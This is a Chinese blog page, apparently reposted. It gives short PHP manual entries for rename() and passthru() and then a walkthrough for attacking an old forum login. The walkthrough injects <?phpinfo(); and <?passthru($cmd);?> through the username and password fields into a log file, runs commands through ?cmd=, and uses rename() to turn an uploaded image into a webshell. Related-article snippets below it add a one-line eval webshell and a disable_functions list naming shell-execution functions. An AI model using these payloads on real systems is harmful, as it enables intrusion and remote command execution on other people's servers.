PHP函数:passthru()与rename(file1,file2)

最新推荐文章于 2024-09-17 20:18:24 发布
最新推荐文章于 2024-09-17 20:18:24 发布
阅读量71 收藏
点赞数
文章标签: php shell

rename

(PHP 3, PHP 4 )

rename -- 文件重命名

说明

bool rename ( string oldname, string newname)

尝试把 oldname 重命名为 newname

如果成功则返回 TRUE,失败则返回 FALSE

passthru

(PHP 3, PHP 4 )

passthru --  Execute an external program and display raw output

Description

void passthru ( string command [, int return_var])


三、利用方法
不用注册任何账户,到登陆页面,在登陆用户名的地方先输入<?phpinfo();(注意有分号),然后在输入密码的地方输入?>123456,回车。这里大家可能明白了,密码前两位是显示的,这样illegallog.php里面保存的就是:
<?phpinfo(); ?>*****6 127.0.0.1 1022383175

这就可以查看php的设置了,我们先看一下register_globals这个设置是否为on。(大部分的网站都是on)好,然后我们在登陆口输入<?passthru($cmd);?>,这里最好不用system(),我在做测试的时候很多网站把这个system()函数禁用了。
然后我们调用 http://192.168.0.13/forumdata/illegallog.php?cmd=dir
前面出来一堆垃圾信息,往最下面看是不是可以看到目录被列出来了?但是这样写入有点麻烦,因为在实验的时候,大的网站注册用户有10万多人,那么这个文件会大的出奇,打开速度奇慢。
那么我们这里其实还可以这样写入<?reaname($a,$b);?>,我们把php的shell改成jpg格式的图片,上传到主机。
在URL中调用:
http://192.168.0.13/forumdata/illegallog.p...chments/Jam.php
然后我们直接提交URL:
http://192.168.0.13/attachments/Jam.php就?...一个shell了吧!
weixin_33850890
关注
不安全的文件上传基本原理(Unsafe file upload)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-17 3820
不安全的文件上传基本原理(File upload vulnerabilities) 什么是文件上传漏洞? 常用1句话(密码全为1) Godzilla YYDS Raw or Base64 加密器区别 生成的面杀shell对比 pikachu clientcheck servercheck getimagesize cmd 合成图片马 exiftool dvwa Low Level Medium Level High Level Impossible Level PortSwigger 通过 .htacces
Passthru接收数据流程图
11-05
Passthru接收数据流程图!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
i春秋之爆破-2 -------- 文件读取
weixin_44632787的博客
09-19 1003
题目 知识点: PHP文件读取函数 利用Linux读取文件函数 (一)PHP文件读取的几个函数: fread fgets fgetss file readfile file_get_contents show_source 参考来源:https://www.jb51.net/article/53266.htm (二)利用Linux读取文件函数 system exec shell_exec passthru popen 参考来源: https://bbs.ichunqiu.com/foru
php go函数,使用 Go 实现 PHP 常用内置函数 php2go
weixin_28304023的博客
03-17 663
软件介绍php2go —— 使用 Golang 实现 PHP 常用内置函数,目前已经实现了 140+ 函数。下载&安装gogetgithub.com/syyongx/php2goPHP FunctionsDate/Time Functionstime()strtotime()date()checkdate()sleep()usleep()String Functionsstrpos()...
php执行函数吗_PHP代码执行函数
weixin_35683330的博客
03-08 97
危险函数mixed eval (string $code) 把字符串作为PHP代码执行bool assert (mixed $assertion [,string $description]) 替代eval函数。相同功能。mixed preg_replace(mixed $pattern,mixed $replacement,mixed $subject[,int $limit=-1 [,int...
PHP代码审计-常见危险函数
灰蜗牛
09-20 6974
PHP代码执行函数eval & assert & preg_replace 包含函数:require、include、require_once、include_once 命令执行函数:exec、system、passthru、proc_open、shell_exec、system 文件操作函数file、copy、file_get_contents、file_put_contents、fopen等 特殊函数
php开启安全模式后禁用的函数集合
10-28
具体到文件系统操作函数,主要包括了用于文件函数如fopen()、fread()、fwrite()、unlink()、rename()、chmod()等,它们在安全模式下不能对不属于运行脚本的拥有者的文件进行操作。这类函数在执行时会检查运行...
PHP危险函数总结
Lemon's blog
08-17 3968
前言:PHP中有很多危险函数,如phpinfo() ,这次就来详细总结一下PHP中的危险函数,方便以后学习。 一、PHP代码执行函数 eval()函数 定义和用法: eval() 函数把字符串按照 PHP 代码来计算. 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 这个用法就会产生漏洞,通过一个例子来看一下: <?php $var = "var"; if (isset($_GE...
php审计之——常见危险函数
qq_44632427的博客
07-29 805
一、php代码执行函数 1、eval:把字符串$code作为代码来执行。很多常见的webshell都是用eval来执行具体操作的。 例如一句话: <?php @eval($_POST['xxx']);?> 2、assert:调试函数,检查第一个断言是否为FALSE。(把字符串$assertion作为php代码执行) 因为大多数杀软把eval列入黑名单了,所以用assert来代替eva...
PHP中关于php.ini参数优化详解
12-20
disable_functions = system,passthru,exec,shell_exec,popen,phpinfo, chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir,rmdir,rename,file,file_get_contents,fputs,fwrite,...
SEAFARING靶场渗透
kknifek的博客
09-13 539
??echo '<??
dedecms(四种webshell姿势)
2301_81881972的博客
09-14 977
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 841
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
CTFShow-反序列化
最新发布
qq_66013948的博客
09-17 561
private变量会被序列化为:\x00类名\x00变量名protected变量会被序列化为: \x00*\x00变量名public变量会被序列化为:变量名__sleep() //在对象被序列化之前运行 *__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) *如果类中同时定义了 __unserialize() 和 __wakeup() 两个魔术方法, 则只有 __unserialize() 方法会生效,
YOLOv9改进系列,YOLOv9主干网络替换为RepViT (CVPR 2024,清华提出,独家首发),助力涨点
weixin_44779079的博客
09-17 357
YOLOv9主干网络替换为RepViT,助力涨点,通过结合轻量级ViTs的架构设计,重新审视了轻量级CNNs的高效设计,最终得到了RepViT,这是一种为资源受限的移动设备设计的全新轻量级CNN家族。RepViT在多个视觉任务中超越了现有的轻量级ViTs和CNNs,表现出了优异的性能和延迟,突显了纯轻量级CNNs在移动设备上应用的广阔前景。
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1131
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
【getshellphpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 745
访问一下 最后getshell
【渗透测试】——Upload靶场实战(1-5关)
HinsCoder的博客
09-16 645
upload-labs是一个使用 php 语言编的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共21关,每一关都包含着不同上传方式。
PHP exec与system函数:启动应用、批处理与CMD命令详解
PHP还提供了其他与系统命令交互的函数,如`passthru`(直接输出命令输出,不保存到变量),`escapeshellcmd`(用于转义字符串以防止shell注入攻击)。根据具体需求,选择合适的函数进行操作。 总结,掌握PHP的`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值